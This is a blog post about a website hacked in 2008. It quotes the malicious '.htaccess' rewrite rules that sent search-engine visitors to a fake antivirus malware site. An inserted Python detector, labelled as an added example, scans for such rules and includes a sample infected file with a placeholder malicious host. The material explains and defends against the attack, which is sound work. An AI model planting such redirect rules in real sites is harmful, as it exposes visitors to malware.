Risky Thinking
On Risk Management, Business Continuity, and Security
17 January, 2018

My Website Got Hacked!

An examination of how our website was hacked.

Anybody who was referred to (or some other sites) through a search engine was redirected to a Russian malware site for a fake “AntiVirus” scanner. Searching around the net, it appears that other sites hosted at IX Web Hosting were also hacked.

It was quite a cunning plan. For the technically inclined, the “.htaccess” file was replaced with the text

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* [R,L]

which for those who don’t speak Apache (Web Server Dialect), means

Redirect everybody who came here from a search engine to a malware site.

The cunning part being that if I visited my own site from a bookmark, a hyperlink, or by typing in the URL, it should have appeared normal. In fact due to an error, the site crashed, which is how I noticed the problem. A visitor who found the site through a search engine also took the trouble to email me a warning that the site had been hacked – Thanks Paul.
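Because the redirect only fires for search-engine referrers, checking the site from a bookmark will not reveal it; scanning the ".htaccess" file itself will. The following is an added example, not part of the original post: a small Python check that flags a RewriteRule redirect guarded by search-engine HTTP_REFERER conditions. The function name, the sample files and the target http://malware.example/ are constructed placeholders.

```python
import re

# Referer substrings taken from the rules quoted in the post.
SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)

# Constructed sample: the post's rules with a placeholder redirect target.
SAMPLE_INFECTED = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://malware.example/ [R,L]
"""

# Constructed benign sample: ordinary image hotlink protection (negated Referer test).
SAMPLE_BENIGN = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.org [NC]
RewriteRule \.(jpg|png)$ - [F]
"""

def find_referer_redirects(htaccess_text):
    """Return one finding per RewriteRule that redirects search-engine referrals."""
    findings, pending = [], []   # pending: engines named by conditions awaiting a rule
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        cond = COND_RE.match(raw)
        if cond:
            pattern = cond.group(1).lower()
            if not pattern.startswith("!"):   # negated tests are the hotlink-protection idiom
                pending += [e for e in SEARCH_ENGINES if e in pattern]
        elif parts[0].lower() == "rewriterule":
            flags = parts[-1].strip("[]").upper().split(",") if parts[-1].startswith("[") else []
            redirect = any(f == "R" or f.startswith("R=") for f in flags)
            target = parts[2] if len(parts) > 2 and not parts[2].startswith("[") else ""
            external = target.lower().startswith(("http://", "https://"))
            if pending and (redirect or external):
                findings.append({"line": lineno, "engines": sorted(set(pending)), "target": target})
            pending = []   # RewriteCond lines apply only to the next RewriteRule
    return findings

if __name__ == "__main__":
    for finding in find_referer_redirects(SAMPLE_INFECTED):
        print(finding)
```

Run on a schedule against every ".htaccess" under the web root, a non-empty result is a reason to compare the file with a known-good copy.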

There unfortunately isn’t any way to tell the visitors who got redirected what happened.

I’ve been through my log files, checked the access logs, changed passwords, and concluded the security breach wasn’t due to a security hole in my website or carelessness on my part.

All I can really do now is warn other site owners of this exploit (via this posting), and

I would like to apologize to
people I do not know
and cannot know
for an unknown error
made by an unknown person.

That sounds almost like the poetry of Donald Rumsfeld.

Michael Z. Bell
November, 2008



Note. Where trademarks are mentioned, they belong to their respective owners.

© Albion Research Ltd. 2018